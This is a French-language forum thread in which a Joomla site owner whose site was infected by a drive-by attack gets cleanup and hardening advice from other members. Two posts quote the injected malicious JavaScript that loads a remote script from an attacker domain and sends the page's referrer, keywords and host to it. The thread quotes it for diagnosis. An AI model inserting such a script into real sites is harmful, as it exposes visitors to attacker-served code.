Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir ?

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir ?

    Bonjour,

    Je suis nouveau sur le forum.

    J'ai fait un site web pour ma femme pour son travail d'indépendante courant 2014.

    Pas eu de problèmes jusqu'en fin d'année passée, fin décembre 2015 où mon ancien hébergeur (Swisscenter) m'a indiqué que j'avais été attaqué et que j'avais 3 jours pour corriger le problème, sans quoi je perdais mon hébergement !

    Corrigé à l'aide d'outils divers, je suis passé chez Informaniak (ayant mon propre site basique et vu les changement de multisites possible chez eux) pour avoir une efficacité un cran au-dessus.

    Vendredi passé (20 mai 2016), je reçois chronologiquement un mail de Switch me disant que mon site est infecté par Drive-By, 10 minutes plus tard, Infomaniak m'indique que mon compte FTP, puis mon site ont été piratés, enfin Google bloque mon site. J'ai passé 7-8 heures à nettoyer, comparer des fichiers pour espérer trouver la faille, mais je ne sais pas si c'est finalement bon, surtout que je continue à recevoir de Switch le message suivant (aujourd'hui, 23 mai 2016 à 12h55) :

    SWITCH a controlé à nouveau votre site kinaissance[.]ch.

    Nous avons constaté que le site kinaissance[.]ch est infecté par : Drive-By.

    Vous trouverez les informations précises sur cet abus, toutes les URL touchées, l'état actuel et les contacts inscrits pour kinaissance[.]ch sur:



    Le mot de passe du compte FTP a été modifié.
    J'ai installé RSFirewall, Akeeba Backup et Akeeba Admin Tools.

    Le site https://sitecheck.sucuri.net/results/www.kinaissance.ch ne m'indique pas de problème de Drive-By. J'ai cependant un script bizarre dont je ne sais pas où le trouver pour le supprimer, car je pense que ce n'est pas sain : http://sinejaneser.com/js?c_utt=J18171&c_utm=

    J'aimerai également changer le mot de passe de la base de données MySQL, mais ne sais trop comment faire.

    Du coup, comment être sûr que le site est vraiment sain ?
    Quel outil puis-je mettre en place pour ajouter de la sécurité ?
    Y'a-t-il des outils pour maintenir automatiquement le site selon les dernière mises à jour stable de joomla et des extensions ?

    D'avance merci.

    Bien cordialement,

    Martial

  • #2
    Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

    Bonjour

    Pour la sécurité, tu as déjà RSFirewall et AdminTools, cela devrait largement suffire... si le site était propre et visiblement ce n'est pas le cas.

    Tu pourras toujours essayer QuickScan (voir ma signature) pour débusquer quelques-uns des virus mais cela ne sera que quelques-uns.

    Si tu ne sais pas comment nettoyer de fond en comble ton site; vois le troisième lien dans ma signature; il dirige vers une page où je prodigue moults conseils pour le faire soi-même... sachant que le plus simple étant de repartir d'une archive propre du site.

    Bonne chance.
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

      J'ai Switch qui m'a découvert une partie modifiée, mais je ne sais pas du tout où trouver ce code :

      hxxp://www.kinaissance.ch/jml/
      Notice from our analyst:
      Malicious javascript on line 94: inline

      Malicious javascript found on line 94:

      <script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefine d||document.referrer!==''||document.referrer!==nul l){document.write('<script type="text/javascript" src="hxxp://sinejaneser.com/js?c_utt=J18171&c_utm='+encodeURIComponent('hxxp://sinejaneser.com/js'+'?'+'default_keyword='+encodeURIComponent(((k= (function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.r eferrer)+'&source='+encodeURIComponent(window.loca tion.host))+'"><'+'/script>');}</script>

      Commentaire


      • #4
        Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

        Probablement dans ton template (index.php) mais débusquer juste cette ligne serait comme avoir utiliser une cuillère pour vider la mer : zéro garantir d'avoir tout nettoyé.
        Christophe (cavo789)
        Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

        Commentaire


        • #5
          Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

          Slt,

          J'ai déjà eu à traiter de type de problème sur des sites de clients qui s'étaient montré négligents.
          Comme le dit Cavo, une seule ligne de nettoyée ne suffira certainement pas à résoudre le problème, car généralement, les scripts malicieux et autres pages douteuses sont placées à plusieurs endroits de l'arborescence d'un site.

          Les outils de cavo pour te protéger sont de bon outils que je ne peux que te conseiller (même si je trouve que Quickscan renvoie parfois beaucoup "faux positifs" qu'un néophyte aura bien du mal à traiter... mais tu peux demander à Cavo lui-même d'intervenir pour un coût presque dérisoire).

          Dans tous les cas, faut vérifier certaines pages comme :
          - administrator/includes/defines.php
          - administrator/includes/framework.php
          - includes/defines.php
          - includes/framework.php

          mais il y a beaucoup d'endroit où peuvent se trouver des fichiers malicieux, avec des noms souvent trompeur (ex : joomla.php).

          Ce que tu peux aussi faire, c'est télécharger l'intégralité du site et le passer à l'analyse d'un bon anti-virus.
          Ils sont capables de détecter de nombreux chevaux de Troie et autres codes dangereux.
          ça te permettra d'identifier les pages malsaines à nettoyer ou supprimer.

          Mais le plus simple, si ton site n'est pas trop sophistiqué et/trop dense en contenu :
          - tu copies tous les textes des articles
          - tu supprimer le site (fichiers et base de données)
          - tu refais une installation toute neuve et toute propre
          - tu ré-écris les articles à partir des textes copiés.

          Ensuite, tu utilises des mots de passe sophistiqués composés de 8 caractères minimum (10 ou 12 c'est mieux), avec majuscule, minuscules, chiffres, et même symboles) tu installes des outils comme aesecure, admintools d'akeeba, Marco's SQL Injection, Brute Force Stop...
          Tu peux aussi changer les droits en écriture de certains fichiers (les mettre en 444)
          - configuration.php
          - administrator/includes/defines.php
          - administrator/includes/framework.php
          - includes/defines.php
          - includes/framework.php

          pour les plus sensibles et les plus visés

          Dol.
          Dernière édition par dolmenhir à 24/05/2016, 07h10
          Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
          Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
          Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

          Commentaire


          • #6
            Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

            Envoyé par martibeche Voir le message
            J'ai Switch qui m'a découvert une partie modifiée, mais je ne sais pas du tout où trouver ce code :

            hxxp://www.kinaissance.ch/jml/
            Notice from our analyst:
            Malicious javascript on line 94: inline

            Malicious javascript found on line 94:

            <script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefine d||document.referrer!==''||document.referrer!==nul l){document.write('<script type="text/javascript" src="hxxp://sinejaneser.com/js?c_utt=J18171&c_utm='+encodeURIComponent('hxxp://sinejaneser.com/js'+'?'+'default_keyword='+encodeURIComponent(((k= (function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.r eferrer)+'&source='+encodeURIComponent(window.loca tion.host))+'"><'+'/script>');}</script>
            Salut, Ce que tu peux faire aussi si tu souhaites retrouver une partie de code (malicieuse ou non) tu telecharge n local ton dossier www et tu fais simplement une recherche sur le contenu du fichier avec une partie du code recherché. Perso j'utilise le logiciel superfinderxt sous Windows.
            Un petit Remerciements fait toujours plaisir

            Commentaire


            • #7
              Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

              Bonjour

              @dolmenhir : réponse fort complète que la tienne, super ! merci pour ton appréciation de mes outils. Pour QuickScan, oui, forcément beaucoup de faux positifs; c'est le point faible quand on recherche sur des mots-clefs (p.ex. base64_decode). QuickScan, toutefois, reconnait plus de 170.000 fichiers comme étant sains (liste blanche) ainsi que toutes les versions de Joomla et WP (je gère 16 CMS). Les faux-positifs sont toutefois impossible à éliminer sur un site, dû au scan par "mot clef".

              Par rapport à ton explication, très bien mais j'ajouterai de conserver les images (dossier /images) et aussi les médias (/media) : les conserver mais bien sûr scanner les dossiers pour en extirper les bestioles.

              Ensuite oui, si on le fait à la main, virer tout le code de Joomla, tous les composants, templates, ... et tout réinstaller. C'est ce que je décris dans mon article "Votre site a été hacké, que faire".

              @_Ovb : oui ok mais c'est très léger... Les virus sont souvent polymorphes et cryptés. Ce code-là, que tu vois dans le HTML de la page n'est probablement pas celui qui est codé dans le source. Cela pourrait être un code en base64 et/ou un code assemblé (des morceaux de chaînes concaténés) etc.

              Puis, depuis le début de cette discussion, nous mentionnons : localiser un virus, c'est bien mais c'est tellement léger car à moins d'avoir une chance inouïe, quand tu détectes un virus sur le site, les petits frères et les petites soeurs sont là, mieux planqué. Cela me fait penser à une expérience que j'ai vécue en Polynésie. Mon épouse et moi étions dans une cabane sur la plage avec un toit en branche. J'ai vu un gros cafard; beurk. J'ai été demandé une solution à la réception et j'ai reçu un aérosol. Je suis revenu dans la chambre et j'ai pfffiut pffffiut sur le cafard. Malheur, ils sont sortis par dizaines. Ta proposition, c'est l'aérosol sans le bruit ni l'odeur : les autres cafards resteront bien cachés.

              Bonne journée.
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire


              • #8
                Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                @cavo : tu as tout a fait raison, et c'est un oubli malheureux de ma part : faut conserver les images et média, à scanner via l'anti-virus.
                Pour le quickscan, perso ça ne me pose pas de soucis. L'outil est puissant et en tant que développeur je sais faire la part des choses. Mais les faux positifs vont faire paniquer plus d'un néophyte qui risquent de supprimer ce qui ne doit pas l'être...
                C'est pour ça que je leur conseille vivement de faire appel à tes services pour deux simples et évidentes raisons :
                1. c'est ton outil, donc tu le maîtrise mieux que personne
                2. le tarif de ton intervention c'est cadeau vu le service rendu

                De toute façon, n'importe qui avec un peu de bon sens n'aura même pas besoin de mon conseil pour le suivre

                @_Ovb : cavo a parfaitement raison. La méthode est trop basique pour parvenir à nettoyer efficacement un site réellement infecté. Sur un site client, j'ai recensé pas moins de 18 fichiers, dont la moitié étaient des backdoors codés en base 64, et placé à des endroits insoupçonnables... d'autant plus que généralement, ce sont des bots qui font le boulot,e t dès qu'ils détectent une anomalie dans leur "maillage infectieux", il réagissent en ré-introduisant de nouveaux fichiers, ailleurs... faut donc rien laisser passer, sinon faut tout recommencer...
                Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
                Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
                Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

                Commentaire


                • #9
                  Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                  Bonjour,

                  Merci pour toutes ces infos.

                  Tout ceci me chagrine et me fait perdre un temps incommensurable. J'ai tenté de copier quickscan en racine du site, mais cela a été détecté comme un piratage FTP et mon site est à nouveau bloqué.

                  Au vu de tant d'énervements, ne serait-ce pas plus simple de transformer les pages en du simple html statique, vu que le site n'est pas d'un grand dynamisme ?

                  Commentaire


                  • #10
                    Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                    y a combien d'articles ?
                    Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
                    Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
                    Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

                    Commentaire


                    • #11
                      Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                      Il y en a 8.

                      Commentaire


                      • #12
                        Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                        ben alors c'est extrêmement simple.
                        1. tu copies/colles le texte de tes articles dans un traitement de texte.
                        2. tu sauvegardes les images associées à chaque article
                        3. tu supprimes tout : fichier et base de données
                        4. tu réinstalles un joomla tout beau tout neuf et exempt de toute infection
                        5. tu recrées tes articles à partir de ton copier/coller
                        6. tu places éventuellement tes images d'article

                        Perso, pour 8 articles, c'est ce que je ferai.
                        A mon avis, en moins d'un heure (même beaucoup moins si tu maitrises) ton site est de nouveau opérationnel.

                        Dol.
                        Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
                        Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
                        Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

                        Commentaire


                        • #13
                          Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                          L'hébergeur ...Niak est vraiment pénible.

                          Leurs sites sont présumés "mieux sécurisés" mais des virus s'introduisent quand même (ok, c'est logique) mais ils te bloquent l'upload d'un scanneur... Mouais...

                          Tu pourrais télécharger ton site en localhost et utiliser QuickScan en local.

                          Pour ta suggestion de copie en html c'est toi qui voit mais c'est un peu dommage non ? Le souci "Mon site a été piraté" peut être solutionné et ensuite tu peux le protéger. Est-ce que ton hébergeur ne dispose pas d'un backup récent de ton site, backup sain et non vérolé ? Si oui, il suffit de restaurer ce backup et ton problème est solutionné.

                          Bonne chance.
                          Christophe (cavo789)
                          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                          Commentaire


                          • #14
                            Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                            Ils ont bien des backups, mais de là à être sûr qu'ils sont sains, c'est un autre problème.

                            C'est clair que l'html, c'est con, mais je voulais d'une certaine manière éviter de repasser 2-3 jours à refaire le site complet, car même si je touche assez bien à l'informatique (heureusement en tant que responsable IT), Joomla a été long à mettre en place pour avoir un site à l'image de ma femme. Donc oui, il n'y a que 8 articles, mais les extensions pour des petites choses sympas prendront quand même du temps à remettre en place. Sans compter que je n'ai aucune assurance que cela ne se reproduise plus.

                            A moins que vous ayez des préférences à mettre pour AdminTools d'Akeeba et RSFirewall pour m'assurer un total blocage ?

                            Bon, je vais commencer par mettre un autre dossier cible et rechanger le mot de passe FTP (fait hier dans la matinée...) suggéré par Infomaniak avec plein de caractères bien chiant à taper, puis rebelote, plein de nouveau fichiers php . En effet, un bots me cherche...

                            Quid pour l'installation de Joomla, je l'installe en racine ou dans un sous-dossier nommé cms ou ce que je veux ?

                            Commentaire


                            • #15
                              Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

                              Envoyé par martibeche Voir le message
                              mais les extensions pour des petites choses sympas
                              C'est souvent par là que le bât blesse...

                              Il y a certaines extensions qui sont codées avec les pieds, ou dont la mise à jour tarde à venir...
                              C'est comme ça que les failles apparaissent...

                              Envoyé par martibeche Voir le message
                              A moins que vous ayez des préférences à mettre pour AdminTools d'Akeeba et RSFirewall pour m'assurer un total blocage ?
                              Pour le blocage total, y a pas de fiabilité à 100%
                              Faut faire de la veille, plus ou moins régulière.
                              Mais avec des outils comme aesecure ou admin tools c'est déjà très bien.

                              Envoyé par martibeche Voir le message
                              Quid pour l'installation de Joomla, je l'installe en racine ou dans un sous-dossier nommé cms ou ce que je veux ?
                              ben ça dépend de ton environnement... te permet-il de faire du multi-site ?
                              Si oui, un sous-dossier sera bien... mais pas d'instal tant que le site corrompu est là... il lui sera facile de remonter l'arborescence.

                              qq d'autre que moi saura pour infomaniak... moi j'utilise pas

                              Dol.
                              Je préfère éclairer que briller.” - “J'ai peut-être l'air froid, mais je suis pas givré.- "ça dépend ça dépasse"
                              Ne m'envoyez pas de message privé pour résoudre vos problèmes sans y avoir été invité.
                              Dolmenhir : tailleur de site web depuis 1997. Spécialiste Joomla depuis 2005. https://www.dolmenhir.fr

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X